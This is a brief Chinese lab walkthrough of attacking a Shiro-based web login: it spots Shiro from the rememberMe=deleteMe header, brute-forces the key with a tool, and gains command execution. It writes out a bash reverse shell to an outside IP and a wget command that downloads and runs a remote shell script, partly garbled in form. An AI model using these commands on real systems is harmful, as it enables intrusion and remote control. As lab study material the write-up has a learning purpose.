常见框架漏洞—Shiro
1.搭建环境
2.访问网页登录并进行抓包
3.发送到重放器
看响应包 header中返回
rememberMe=deleteMe
值,说明该系统使⽤了Shiro框架
4.使用工具连接,输入url并爆破密钥
5.在命令执行框中输入命令
我们输入反弹shell
发现监听不到
6.我们在云服务器新建一个1.txt,里面写入反弹shell的代码
bash -i >& /dev/tcp/47.108.150.249/8888 0>&1
/bin/bash /wget -qO /tmp/shell.sh
https://47.108.150.249/
/shell.sh
/bin/bash /tmp/shell.sh
我们访问后发现成功监听!!
